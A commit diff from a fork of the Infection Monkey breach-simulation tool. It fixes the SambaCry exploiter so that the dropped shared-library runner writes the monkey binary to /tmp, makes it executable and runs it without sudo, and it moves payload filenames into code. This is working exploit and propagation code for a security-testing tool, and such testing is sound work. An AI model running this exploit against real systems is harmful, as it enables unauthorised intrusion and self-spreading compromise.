forked from p15670423/monkey
Merge pull request #55 from guardicore/bugfix/fix-sambacry-for-user
Fix SambaCry not working for non-root user
This commit is contained in:
commit
039cc1bd6c
|
@ -111,7 +111,7 @@ class Configuration(object):
|
||||||
# dropper config
|
# dropper config
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
dropper_try_move_first = sys.argv[0].endswith(".exe")
|
dropper_try_move_first = True
|
||||||
dropper_set_date = True
|
dropper_set_date = True
|
||||||
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
|
||||||
dropper_date_reference_path_linux = '/bin/sh'
|
dropper_date_reference_path_linux = '/bin/sh'
|
||||||
|
@ -260,22 +260,6 @@ class Configuration(object):
|
||||||
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
|
||||||
# Shares to not check if they're writable.
|
# Shares to not check if they're writable.
|
||||||
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
sambacry_shares_not_to_check = ["IPC$", "print$"]
|
||||||
# Name of file which contains the monkey's commandline
|
|
||||||
sambacry_commandline_filename = "monkey_commandline.txt"
|
|
||||||
# Name of file which contains the runner's result
|
|
||||||
sambacry_runner_result_filename = "monkey_runner_result"
|
|
||||||
# SambaCry runner filename (32 bit)
|
|
||||||
sambacry_runner_filename_32 = "sc_monkey_runner32.so"
|
|
||||||
# SambaCry runner filename (64 bit)
|
|
||||||
sambacry_runner_filename_64 = "sc_monkey_runner64.so"
|
|
||||||
# Monkey filename on share (32 bit)
|
|
||||||
sambacry_monkey_filename_32 = "monkey32"
|
|
||||||
# Monkey filename on share (64 bit)
|
|
||||||
sambacry_monkey_filename_64 = "monkey64"
|
|
||||||
# Monkey copy filename on share (32 bit)
|
|
||||||
sambacry_monkey_copy_filename_32 = "monkey32_2"
|
|
||||||
# Monkey copy filename on share (64 bit)
|
|
||||||
sambacry_monkey_copy_filename_64 = "monkey64_2"
|
|
||||||
|
|
||||||
# system info collection
|
# system info collection
|
||||||
collect_system_info = True
|
collect_system_info = True
|
||||||
|
|
|
@ -27,7 +27,7 @@
|
||||||
|
|
||||||
"kill_file_path_linux": "/var/run/monkey.not",
|
"kill_file_path_linux": "/var/run/monkey.not",
|
||||||
"kill_file_path_windows": "%windir%\\monkey.not",
|
"kill_file_path_windows": "%windir%\\monkey.not",
|
||||||
"dropper_try_move_first": false,
|
"dropper_try_move_first": true,
|
||||||
"exploiter_classes": [
|
"exploiter_classes": [
|
||||||
"SSHExploiter",
|
"SSHExploiter",
|
||||||
"SmbExploiter",
|
"SmbExploiter",
|
||||||
|
@ -70,14 +70,6 @@
|
||||||
"sambacry_trigger_timeout": 5,
|
"sambacry_trigger_timeout": 5,
|
||||||
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
|
||||||
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
"sambacry_shares_not_to_check": ["IPC$", "print$"],
|
||||||
"sambacry_commandline_filename": "monkey_commandline.txt",
|
|
||||||
"sambacry_runner_result_filename": "monkey_runner_result",
|
|
||||||
"sambacry_runner_filename_32": "sc_monkey_runner32.so",
|
|
||||||
"sambacry_runner_filename_64": "sc_monkey_runner64.so",
|
|
||||||
"sambacry_monkey_filename_32": "monkey32",
|
|
||||||
"sambacry_monkey_filename_64": "monkey64",
|
|
||||||
"sambacry_monkey_copy_filename_32": "monkey32_2",
|
|
||||||
"sambacry_monkey_copy_filename_64": "monkey64_2",
|
|
||||||
"local_network_scan": false,
|
"local_network_scan": false,
|
||||||
"tcp_scan_get_banner": true,
|
"tcp_scan_get_banner": true,
|
||||||
"tcp_scan_interval": 200,
|
"tcp_scan_interval": 200,
|
||||||
|
|
|
@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
_target_os_type = ['linux']
|
_target_os_type = ['linux']
|
||||||
|
|
||||||
|
# Name of file which contains the monkey's commandline
|
||||||
|
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
||||||
|
# Name of file which contains the runner's result
|
||||||
|
SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
|
||||||
|
# SambaCry runner filename (32 bit)
|
||||||
|
SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
|
||||||
|
# SambaCry runner filename (64 bit)
|
||||||
|
SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
|
||||||
|
# Monkey filename on share (32 bit)
|
||||||
|
SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
|
||||||
|
# Monkey filename on share (64 bit)
|
||||||
|
SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
|
||||||
|
# Monkey copy filename on share (32 bit)
|
||||||
|
SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
|
||||||
|
# Monkey copy filename on share (64 bit)
|
||||||
|
SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
|
||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
self._config = __import__('config').WormConfiguration
|
self._config = __import__('config').WormConfiguration
|
||||||
|
|
||||||
|
@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
smb_client = self.connect_to_server(ip, creds)
|
smb_client = self.connect_to_server(ip, creds)
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
|
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||||
self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
|
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
|
||||||
self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
|
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
|
||||||
self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
|
|
||||||
|
|
||||||
for filename in file_list:
|
for filename in file_list:
|
||||||
try:
|
try:
|
||||||
|
@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_content = None
|
file_content = None
|
||||||
try:
|
try:
|
||||||
file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
|
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||||
desiredAccess=FILE_READ_DATA)
|
desiredAccess=FILE_READ_DATA)
|
||||||
file_content = smb_client.readFile(tree_id, file_id)
|
file_content = smb_client.readFile(tree_id, file_id)
|
||||||
smb_client.closeFile(tree_id, file_id)
|
smb_client.closeFile(tree_id, file_id)
|
||||||
|
@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
|
||||||
|
|
||||||
with self.get_monkey_commandline_file(host, depth,
|
with self.get_monkey_commandline_file(host, depth,
|
||||||
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
self._config.dropper_target_path_linux) as monkey_commandline_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
|
||||||
|
|
||||||
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
|
||||||
|
|
||||||
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
|
||||||
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
|
||||||
|
|
||||||
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
|
||||||
smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
|
smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
|
||||||
|
|
||||||
smb_client.disconnectTree(tree_id)
|
smb_client.disconnectTree(tree_id)
|
||||||
|
|
||||||
|
@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
|
||||||
:return: Array of possible full paths to the module.
|
:return: Array of possible full paths to the module.
|
||||||
"""
|
"""
|
||||||
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
|
||||||
file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
|
file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
|
||||||
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
|
||||||
|
|
||||||
def get_monkey_runner_bin_file(self, is_32bit):
|
def get_monkey_runner_bin_file(self, is_32bit):
|
||||||
if is_32bit:
|
if is_32bit:
|
||||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
|
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
|
||||||
else:
|
else:
|
||||||
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
|
return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
|
||||||
|
|
||||||
def get_monkey_commandline_file(self, host, depth, location):
|
def get_monkey_commandline_file(self, host, depth, location):
|
||||||
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
|
||||||
|
|
|
@ -1,9 +1,9 @@
|
||||||
#!/usr/bin/env bash
|
#!/usr/bin/env bash
|
||||||
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
|
||||||
gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
|
gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
|
||||||
rm sc_monkey_runner.o
|
rm sc_monkey_runner.o
|
||||||
strip sc_monkey_runner_64.so
|
strip sc_monkey_runner64.so
|
||||||
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
|
||||||
gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
|
gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
|
||||||
rm sc_monkey_runner.o
|
rm sc_monkey_runner.o
|
||||||
strip sc_monkey_runner_32.so
|
strip sc_monkey_runner32.so
|
|
@ -22,16 +22,16 @@ int samba_init_module(void)
|
||||||
#ifdef ARCH_IS_64
|
#ifdef ARCH_IS_64
|
||||||
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
|
||||||
const char MONKEY_NAME[] = "monkey64";
|
const char MONKEY_NAME[] = "monkey64";
|
||||||
const char MONKEY_COPY_NAME[] = "monkey64_2";
|
|
||||||
#else
|
#else
|
||||||
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
|
||||||
const char MONKEY_NAME[] = "monkey32";
|
const char MONKEY_NAME[] = "monkey32";
|
||||||
const char MONKEY_COPY_NAME[] = "monkey32_2";
|
|
||||||
#endif
|
#endif
|
||||||
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
|
||||||
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
|
||||||
const int ACCESS_MODE = 0777;
|
const int ACCESS_MODE = 0777;
|
||||||
const char RUN_MONKEY_CMD[] = "sudo ./";
|
const char RUN_MONKEY_CMD[] = "./";
|
||||||
|
const char MONKEY_DEST_FOLDER[] = "/tmp";
|
||||||
|
const char MONKEY_DEST_NAME[] = "monkey";
|
||||||
|
|
||||||
int found = 0;
|
int found = 0;
|
||||||
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
|
||||||
|
@ -102,7 +102,7 @@ int samba_init_module(void)
|
||||||
|
|
||||||
// Build commandline
|
// Build commandline
|
||||||
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
|
||||||
strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
|
strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
|
||||||
strncat(commandline, " ", 1);
|
strncat(commandline, " ", 1);
|
||||||
|
|
||||||
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
|
||||||
|
@ -133,7 +133,12 @@ int samba_init_module(void)
|
||||||
fread(monkeyBinary, 1, monkeySize, pFile);
|
fread(monkeyBinary, 1, monkeySize, pFile);
|
||||||
fclose(pFile);
|
fclose(pFile);
|
||||||
|
|
||||||
pFile = fopen(MONKEY_COPY_NAME, "wb");
|
if (0 != chdir(MONKEY_DEST_FOLDER))
|
||||||
|
{
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
pFile = fopen(MONKEY_DEST_NAME, "wb");
|
||||||
if (NULL == pFile)
|
if (NULL == pFile)
|
||||||
{
|
{
|
||||||
free(monkeyBinary);
|
free(monkeyBinary);
|
||||||
|
@ -144,7 +149,7 @@ int samba_init_module(void)
|
||||||
free(monkeyBinary);
|
free(monkeyBinary);
|
||||||
|
|
||||||
// Change monkey permissions
|
// Change monkey permissions
|
||||||
if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
|
if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
|
||||||
{
|
{
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
|
@ -587,46 +587,6 @@ SCHEMA = {
|
||||||
"IPC$", "print$"
|
"IPC$", "print$"
|
||||||
],
|
],
|
||||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||||
},
|
|
||||||
"sambacry_commandline_filename": {
|
|
||||||
"title": "SambaCry commandline filename",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey_commandline.txt",
|
|
||||||
},
|
|
||||||
"sambacry_runner_result_filename": {
|
|
||||||
"title": "SambaCry runner result filename",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey_runner_result",
|
|
||||||
},
|
|
||||||
"sambacry_runner_filename_32": {
|
|
||||||
"title": "SambaCry runner filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "sc_monkey_runner32.so",
|
|
||||||
},
|
|
||||||
"sambacry_runner_filename_64": {
|
|
||||||
"title": "SambaCry runner filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "sc_monkey_runner64.so",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_filename_32": {
|
|
||||||
"title": "SambaCry monkey filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey32",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_filename_64": {
|
|
||||||
"title": "SambaCry monkey filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey64",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_copy_filename_32": {
|
|
||||||
"title": "SambaCry monkey copy filename (32 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey32_2",
|
|
||||||
},
|
|
||||||
"sambacry_monkey_copy_filename_64": {
|
|
||||||
"title": "SambaCry monkey copy filename (64 bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "monkey64_2",
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
|
|
Loading…
Reference in New Issue